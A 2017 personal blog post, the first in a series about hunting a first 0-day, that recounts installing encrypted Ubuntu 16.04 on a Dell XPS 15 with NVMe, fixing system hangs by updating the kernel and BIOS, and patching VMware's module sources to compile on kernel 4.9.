Thanks for your time! In the meantime you can check the post I did on SensePost's blog about ptmalloc2 implementation basics.

viernes, 27 de enero de 2017

The first step

Hello and welcome,

This blog is about the journey on the achievement of my first 0-day which, let's be honest, can never happen but I'm sure we'll learn a lot of things along the way :)
The journey should only be considered complete when the following conditions are met:
  • Privilege escalation or,
  • Code execution
  • Involves shellcoding
  • Bypass of exploit mitigations

Intro

First things first. Setup.

So, some weeks ago, had some problems when setting up Ubuntu 16.04 on a laptop which, by then, I really needed to have up and running as quick as possible. The easiest way would have been:

  • Reinstalling
  • Changing to another linux distro
  • Ask for a new laptop with preshipped Ubuntu
So for the first post, instead of talking about anythin related to exploiting, I will start my first post with a little story that will help you overcome all the barriers that Ubuntu 16.04 and Dell sets on users if they want to use their OS of choice. And before we start:

Takeaways for you, the reader

  • How to install Ubuntu 16.04 with encryption on a laptop with an SSD (NVME)
  • Know about some Ubuntu bugs that haven't got a fix
  • Know about some Ubuntu bugs that have a fix
  • How to run the latest VMWare Player on newer Kernels (4.9.5)

Here we go!

First days - Installing Ubuntu 16.04 with encryption

I was given a Dell XPS 15 shipped with Windows 10 Home. As a pc-gamer I am used to have Windows and make heavy use of virtualization programs to run Linux on top of it.
But since there wasn't an easy way to set bitlocker on Windows 10 Home and I wasn't going to play any games on this laptop, I decided to get rid of the preshipped OS and install Ubuntu on it.
So, I set the BIOS legacy boot option, insert the live Ubuntu USB, select installation, format the drive into ext4 format, choose encryption and... BANG! Ubuntu's standard installation won't select the right NVME partition to write the boot into, it tries to write the boot into "/dev/nvme" which is not a real partition, hence we face our first problem.

PROBLEM:
If we choose the standard installation with full disk encryption the wizard won't let us choose which partition to write the boot into but if we choose the alternative installation where we can choose where to write the boot into, it won't let us choose the full disk encryption.


NVMe, UGH!

SOLUTION:
After playing around with the Ubuntu installer wizard I managed to choose the right partition to write the boot into and choose full disk encryption as well:
  1. Boot into the Live Ubuntu USB
  2. Get boot-repair
  3. Run boot-repair and set the "boot flag" on the partition you want the boot written to (in my case "/dev/nvme0n1p1")
  4. Run the installer wizard
  5. Select the alternative installation
  6. Change the partition that the boot is going to be written to
  7. Go back in the wizard and select the standard installation with full disk encryption
  8. ???
  9. Profit!

But rest not, for tragedies are about to come...

The laptop hangs up

After a day of using the laptop and in the middle of something important (for this I have to say, thank programmers for the invention of auto-saving) the whole system freezes. Nothing works. The mouse, keyboard, graphics... everything is stuck. Not even REISUB works.
After some time searching on Google and forums I stumble upon this Bug, which has been around since 2013 yet nobody has come up with any solutions.
Some people said they got it fixed by updating the kernel: I updated the kernel to the next version (I had 4.4 by that time so, 4.5 it is).
Nothing. Same problem plus I can't control the brightness of the screen anymore. Anything else?
Of course, keep reading!
Now I can't type the password to decrypt the disk. Althought the "splash" screen is showing, there's a prompt on top left of the screen where everything I type shows but it doesn't seem to be a proper shell nor the password input for decryption.
Then, rebooted, grub appears the same way it would do as if you hold shift at boot and, there, it did let me choose "Ubuntu" or "Advanced options". I select "Ubuntu" and suddenly a new prompt to decrypt the disk appears.
More Googling aaaaand... it seems that, again it's a known bug, and found someone else who had the same problem but, in my case, I didn't install any new graphic drivers.

PROBLEM:
What the hell is happening? Seriously? Everything hangs up from time to time, sometimes when Ubuntu gets to boot with Kernel 4.5 the graphic cards seem to go so slow. And the only thing that we can think of is updating the Kernel and Bios.

FIX:
Upgrading to kernel 4.9.0 did it for me but, since I wanted to know how far I could go I upgraded to Kernel 4.9.4 and also, updated the BIOS, 'cause, why not.
If you are looking to update your Dell's XPS laptop please, refer to this link: Dell BIOS Update

No more hangs anymore! Oh wait...

So far so good but, when trying to install VMWare it just wouldn't compile plus, you need GCC-6.2.0. So...

PROBLEM:
Latest VMWare will not compile on newer kernels (4.9.5). Seems like the Kernel developers decided to regroup the flags from get_user_pages in version 4.6 into one variable on version 4.9.

(dirty) FIX:
The FIX can be found here but, since the formatting is not that good, will paste it here for the easeness on copy-pasting for you, the reader:

Extract and edit
tar -xf /usr/lib/vmware/modules/source/vmmon.tar
vi vmmon-only/linux/hostif.c
 
In vmmon-only/linux/hostif.c around line 1162, change:
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
    retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
#else
    retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
    numPages, 0, 0, ppages, NULL);
#endif
to:
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
    retval = get_user_pages((unsigned long)uvAddr, numPages, 0, ppages, NULL);
#else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
        retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
        retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                    numPages, 0, 0, ppages, NULL);
    #endif
#endif
Now "re-tar", extract the next file and edit:
sudo tar -cf /usr/lib/vmware/modules/source/vmmon.tar vmmon-only/
tar -xf /usr/lib/vmware/modules/source/vmnet.tar
vi vmnet-only/userif.c
In vmnet-only/userif.c, around line 113, change:
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
    retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
#else
    retval = get_user_pages(current, current->mm, addr,
                1, 1, 0, &page, NULL);
#endif
to
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
    retval = get_user_pages(addr, 1, 0, &page, NULL);
#else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
        retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
        retval = get_user_pages(current, current->mm, addr,
        1, 1, 0, &page, NULL);
    #endif
#endif
Now re-tar and run the VMWare installer, feed it with the right path for GCC-6.2.0 and you're done!
sudo tar -cf /usr/lib/vmware/modules/source/vmnet.tar vmnet-only/
Woo! That's it. How I got it all setup... But I, in the end, won't keep Ubuntu. Still haven't made my mind up on which Linux distribution to choose or keeping Windows 10 (Win-afl maybe?)

Next post

Stay tuned! More to come! Some fuzzing and analyzing crashes found while doing so.

Happy learning!